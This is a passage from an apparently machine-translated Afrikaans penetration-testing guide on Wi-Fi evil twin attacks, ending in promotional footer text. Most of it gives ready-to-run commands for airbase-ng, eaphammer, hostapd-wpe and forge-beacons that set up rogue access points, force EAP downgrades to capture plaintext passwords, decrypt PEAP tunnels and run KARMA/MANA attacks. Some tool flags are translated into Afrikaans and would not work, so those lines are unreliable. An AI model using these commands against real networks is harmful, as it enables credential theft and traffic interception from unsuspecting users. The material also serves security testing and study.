- Moeilikheid in Differensiasie: Toestelle sukkel om tussen legitieme en bedrieglike toegangspunte te onderskei wanneer hulle dieselfde ESSID en enkripsietipe deel. Werklike netwerke gebruik dikwels verskeie toegangspunte met dieselfde ESSID om dekking vlot uit te brei.
- Kliënt Roaming en Verbindingsmanipulasie: Die 802.11-protokol laat toestelle toe om tussen toegangspunte binne dieselfde ESS te beweeg. Aanvallers kan hiervan gebruik maak deur 'n toestel te lok om van sy huidige basisstasie te ontkoppel en met 'n bedrieglike een te verbind. Dit kan bereik word deur 'n sterker sein aan te bied of die verbinding met die legitieme toegangspunt te ontwrig deur metodes soos deautentiseringspakette of ontwrigting.
- Uitdagings in Uitvoering: Dit is moeilik om 'n boosaardige tweelingaanval suksesvol uit te voer in omgewings met verskeie, goedgeplaaste toegangspunte. Die deautentisering van 'n enkele legitieme toegangspunt lei dikwels daartoe dat die toestel met 'n ander legitieme toegangspunt verbind tensy die aanvaller al die nabygeleë toegangspunte kan deautentiseer of die bedrieglike toegangspunt strategies kan plaas.
Jy kan 'n baie basiese Oop Boosaardige Tweeling (geen vermoëns om verkeer na die internet te roeteer) skep deur:
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Jy kan ook 'n Boosaardige Tweeling skep met eaphammer (let daarop dat om boosaardige tweelinge met eaphammer te skep, moet die koppelvlak NIET in monitor-modus wees):
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
Of deur Airgeddon te gebruik: Opsies: 5,6,7,8,9 (binne die Evil Twin-aanvalsmenu).
Let daarop dat as 'n ESSID in die PNL standaard as WPA beskerm is, sal die toestel nie outomaties aan 'n Oop kwaadwillige tweeling koppel nie. Jy kan probeer om die werklike AP te DoS en hoop dat die gebruiker handmatig aan jou Oop kwaadwillige tweeling koppel, of jy kan die werklike AP DoS en 'n WPA-kwaadwillige tweeling gebruik om die handdruk vas te vang (deur hierdie metode sal jy nie in staat wees om die slagoffer aan jou te laat koppel nie aangesien jy nie die PSK ken nie, maar jy kan die handdruk vasvang en probeer om dit te kraak).
Sommige OS en AV sal die gebruiker waarsku dat dit gevaarlik is om aan 'n Oop netwerk te koppel...
WPA/WPA2 Kwaadwillige Tweeling
Jy kan 'n Kwaadwillige Tweeling met WPA/2 skep en as die toestelle ingestel is om met daardie SSID met WPA/2 te koppel, gaan hulle probeer om te koppel. Hoe dan ook, om die 4-weg-handdruk te voltooi moet jy ook die wagwoord weet wat die klient gaan gebruik. As jy dit nie weet nie, sal die koppeling nie voltooi word.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Onderneming Boosaardige Tweeling
Om hierdie aanvalle te verstaan, sal ek aanbeveel om eers die kort WPA Onderneming verduideliking te lees.
Gebruik van hostapd-wpe
hostapd-wpe
benodig 'n konfigurasie lêer om te werk. Om die generering van hierdie konfigurasies te outomatiseer, kan jy https://github.com/WJDigby/apd_launchpad gebruik (laai die python lêer binne /etc/hostapd-wpe/ af)
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
In die opsetlêer kan jy baie verskillende dinge kies soos ssid, kanaal, gebruikerslêers, sleutel, dh parameters, wpa weergawe en outentifisering...
Die gebruik van hostapd-wpe met EAP-TLS om enige sertifikaat toe te laat om in te teken.
Die gebruik van EAPHammer
# Generate Certificates
./eaphammer --cert-wizard
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
Standaard, EAPHammer stel hierdie outentiseringsmetodes voor (merk GTC as die eerste een om te probeer om platte teks wagwoorde te verkry en dan die gebruik van meer robuuste outentiseringsmetodes):
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
Dit is die verstek metodologie om lang verbindings tye te vermy. Nietemin, jy kan ook spesifiseer om die verifikasie metodes vanaf die swakste tot die sterkste aan die bediener te spesifiseer:
--negotiate weakest
Of jy kan ook gebruik maak van:
--onderhandel gtc-afwaardering
om 'n hoogs effektiewe GTC-afwaardering implementasie te gebruik (platte teks wagwoorde)--onderhandel handmatig --fase-1-metodes PEAP,TTLS --fase-2-metodes MSCHAPV2,GTC,TTLS-PAP
om handmatig die aangebode metodes te spesifiseer (deur dieselfde outentiseringsmetodes in dieselfde volgorde aan te bied as die organisasie, sal die aanval baie moeiliker wees om op te spoor).- Vind meer inligting in die wiki
Die gebruik van Airgeddon
Airgeddon
kan voorheen gegenereerde sertifikate gebruik om EAP-outentisering aan te bied aan WPA/WPA2-Enterprise netwerke. Die vals netwerk sal die verbindingsprotokol afgradeer na EAP-MD5 sodat dit in staat sal wees om die gebruiker en die MD5 van die wagwoord vas te vang. Later kan die aanvaller probeer om die wagwoord te kraak.
Airggedon
bied jou die moontlikheid van 'n deurlopende Evil Twin-aanval (lawaaierig) of net die Evil Aanval skep totdat iemand koppel (glad).
Foutopsporing van PEAP en EAP-TTLS TLS-tunnels in Evil Twins-aanvalle
Hierdie metode is getoets in 'n PEAP-verbinding, maar aangesien ek 'n willekeurige TLS-tunnel dekodeer, behoort dit ook te werk met EAP-TTLS
Binne die konfigurasie van hostapd-wpe kommentaar die lyn wat dh_file bevat (vanaf dh_file=/etc/hostapd-wpe/certs/dh
tot #dh_file=/etc/hostapd-wpe/certs/dh
)
Dit sal hostapd-wpe
laat sleutels uitruil deur RSA in plaas van DH, sodat jy later die verkeer kan dekodeer deur die bedieners se privaatsleutel te ken.
Begin nou die Evil Twin met behulp van hostapd-wpe
met daardie gewysigde konfigurasie soos gewoonlik. Begin ook wireshark
op die koppelvlak wat die Evil Twin-aanval uitvoer.
Nou of later (wanneer jy reeds 'n paar outentiseringspogings vasgelê het) kan jy die privaat RSA-sleutel byvoeg by wireshark in: Edit --> Voorkeure --> Protokolle --> TLS --> (RSA-sleutellys) Wysig...
Voeg 'n nuwe inskrywing by en vul die vorm in met hierdie waardes: IP-adres = enige -- Poort = 0 -- Protokol = data -- Sleutel-lêer (kies jou sleutel-lêer, om probleme te voorkom, kies 'n sleutel-lêer sonder wagwoordbeskerming).
En kyk na die nuwe "Gedekodeerde TLS" tab:
KARMA, MANA, Luide MANA en Bekende bakens aanval
ESSID en MAC swart/witlyste
Verskillende tipes Media Access Control Filterlyste (MFACLs) en hul ooreenstemmende modusse en effekte op die gedrag van 'n bedrieglike Toegangspunt (AP):
- MAC-gebaseerde Witlys:
- Die bedrieglike AP sal slegs reageer op navrae van toestelle wat in die witlys gespesifiseer is, onsigbaar bly vir almal wat nie gelys is nie.
- MAC-gebaseerde Swartlys:
- Die bedrieglike AP sal navrae van toestelle op die swartlys ignoreer, wat die bedrieglike AP effektief onsigbaar maak vir daardie spesifieke toestelle.
- ESSID-gebaseerde Witlys:
- Die bedrieglike AP sal slegs reageer op navrae vir spesifieke ESSIDs wat gelys is, wat dit onsigbaar maak vir toestelle waarvan die Voorkeur Netwerklyste (PNLs) nie daardie ESSIDs bevat nie.
- ESSID-gebaseerde Swartlys:
- Die bedrieglike AP sal nie reageer op navrae vir die spesifieke ESSIDs op die swartlys nie, wat dit onsigbaar maak vir toestelle wat daardie spesifieke netwerke soek.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
KARMA
Hierdie metode maak dit vir 'n aanvaller moontlik om 'n bose toegangspunt (AP) te skep wat reageer op alle navrae van toestelle wat probeer om met netwerke te verbind. Hierdie tegniek mislei toestelle om met 'n aanvaller se AP te verbind deur die netwerke na te boots wat die toestelle soek. Wanneer 'n toestel 'n verbindingsversoek na hierdie bedrieglike AP stuur, voltooi dit die verbinding, wat veroorsaak dat die toestel per abuis met die aanvaller se netwerk verbind.
MANA
Daarna het toestelle begin om ongevraagde netwerkantwoorde te ignoreer, wat die doeltreffendheid van die oorspronklike karma-aanval verminder het. Nietemin is 'n nuwe metode, bekend as die MANA-aanval, deur Ian de Villiers en Dominic White bekendgestel. Hierdie metode behels dat die bose AP die Voorkeur Netwerklyste (PNL) van toestelle vasvang deur op hul uitsaaivrae te reageer met netwerkname (SSIDs) wat voorheen deur die toestelle versoek is. Hierdie gesofistikeerde aanval verbygaan die beskerming teen die oorspronklike karma-aanval deur die manier waarop toestelle bekende netwerke onthou en prioriteer, te misbruik.
Die MANA-aanval werk deur beide gerigte en uitsaaivrae van toestelle te monitor. Vir gerigte navrae neem dit die toestel se MAC-adres en die versoekte netwerknaam op, en voeg hierdie inligting by 'n lys. Wanneer 'n uitsaaivraag ontvang word, reageer die AP met inligting wat ooreenstem met enige van die netwerke op die lys van die toestel, wat die toestel verlok om met die bose AP te verbind.
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
Luide MANA
'n Luide MANA-aanval is 'n gevorderde strategie vir wanneer toestelle nie gerigte navorsing gebruik nie of wanneer hul Voorkeur Netwerklyste (PNL) onbekend is vir die aanvaller. Dit werk op die beginsel dat toestelle in dieselfde area waarskynlik sommige netwerkname in hul PNLs sal deel. In plaas van selektief te reageer, stuur hierdie aanval sondes wat vir elke netwerknaam (ESSID) uitgesaai word wat in die gekombineerde PNLs van al waargenome toestelle gevind word. Hierdie breë benadering verhoog die kans dat 'n toestel 'n bekende netwerk sal herken en sal probeer om met die bedrieglike Toegangspunt (AP) te verbind.
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
Bekende Beacon-aanval
Wanneer die Loud MANA-aanval nie voldoende is nie, bied die Bekende Beacon-aanval 'n ander benadering. Hierdie metode brute-force die verbindingsproses deur 'n AP te simuleer wat reageer op enige netwerknaam, deur 'n lys potensiële ESSIDs afgelei van 'n woordelys te deurloop. Dit simuleer die teenwoordigheid van verskeie netwerke, in die hoop om 'n ESSID binne die slagoffer se PNL te koppel, wat 'n verbindingspoging na die vervaardigde AP aanmoedig. Die aanval kan versterk word deur dit te kombineer met die --loud
-opsie vir 'n meer aggressiewe poging om toestelle te vang.
Eaphammer het hierdie aanval geïmplementeer as 'n MANA-aanval waar al die ESSIDs binne 'n lys geloods word (jy kan dit ook kombineer met --loud
om 'n Loud MANA + Bekende beacons-aanval te skep):
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
Bekende Beacon Burst-aanval
Die Bekende Beacon Burst-aanval behels die vinnige uitsaai van seinrame vir elke ESSID wat in 'n lêer gelys is. Dit skep 'n digte omgewing van valse netwerke, wat die waarskynlikheid verhoog dat toestelle met die bedrieglike AP verbind, veral wanneer dit gekombineer word met 'n MANA-aanval. Hierdie tegniek maak gebruik van spoed en volume om toestelle se netwerkseleksiemeganismes te oorweldig.
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
Wi-Fi Direk
Wi-Fi Direk is 'n protokol wat toestelle in staat stel om direk met mekaar te skakel deur gebruik te maak van Wi-Fi sonder die nodigheid van 'n tradisionele draadlose toegangspunt. Hierdie vermoë is geïntegreer in verskeie Internet of Things (IoT) toestelle, soos drukkers en televisies, wat direkte toestel-tot-toestel kommunikasie fasiliteer. 'n Merkwaardige kenmerk van Wi-Fi Direk is dat een toestel die rol van 'n toegangspunt aanneem, bekend as die groep eienaar, om die verbinding te bestuur.
Sekuriteit vir Wi-Fi Direk verbindinge word tot stand gebring deur Wi-Fi Protected Setup (WPS), wat verskeie metodes ondersteun vir veilige koppeling, insluitend:
- Drukknoppie Konfigurasie (PBC)
- PIN invoer
- Naby-veld Kommunikasie (NFC)
Hierdie metodes, veral PIN invoer, is vatbaar vir dieselfde kwesbaarhede as WPS in tradisionele Wi-Fi netwerke, wat hulle teikens maak vir soortgelyke aanvalsvektore.
EvilDirect Ontvoering
EvilDirect Ontvoering is 'n aanval spesifiek vir Wi-Fi Direk. Dit boots die konsep van 'n Evil Twin aanval na, maar teiken Wi-Fi Direk verbindinge. In hierdie scenario boots 'n aanvaller 'n legitieme groep eienaar na met die doel om toestelle te mislei om met 'n skadelike entiteit te verbind. Hierdie metode kan uitgevoer word met behulp van gereedskap soos airbase-ng
deur die spesifisering van die kanaal, ESSID, en MAC-adres van die nagebootsde toestel:
Verwysings
- https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
- https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
- https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
- http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
- https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
TODO: Neem 'n kyk na https://github.com/wifiphisher/wifiphisher (aanmelding met facebook en imitasie van WPA in kaptiewe portale)
Sluit aan by HackenProof Discord bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
Hack-insigte
Betrokkenheid by inhoud wat die opwinding en uitdagings van hack weergee
Nuutste Hack Nuus
Bly op hoogte van die snelveranderende hackwêreld deur middel van nuus en insigte in werklikheid
Nuutste Aankondigings
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en noodsaaklike platformopdaterings
Sluit aan by ons op Discord en begin vandag saamwerk met top hackers!
Leer AWS hack van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of laai HackTricks in PDF af Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel jou hacktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.